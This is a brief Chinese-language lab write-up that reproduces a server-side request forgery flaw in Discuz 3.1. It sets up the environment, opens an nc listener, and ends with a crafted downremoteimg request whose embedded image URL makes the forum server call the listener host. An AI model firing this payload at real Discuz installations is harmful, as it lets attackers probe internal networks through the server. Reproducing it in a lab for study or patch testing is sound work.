QQ交流群:876554035
#001 环境搭建:
- List item
- Phpstudy+win7搭建discuz漏洞环境
- 把Discuz-3.1 源码拖到网站根目录,然后访问upload目录进行安装,根据提示即可
- 安装完成访问一波:
#002 漏洞复现: - Centos7,临时关闭防火墙
- 开启nc监听6666端口:nc -lvp 6666
- 查看centos7的ip
- 利用discuz的漏洞向centos7发起一个请求:
http://192.168.136.132/discuz-ssrf/upload/forum.php?mod=ajax&action=downremoteimg&message=[img]http://192.168.136.133:6666/?data=he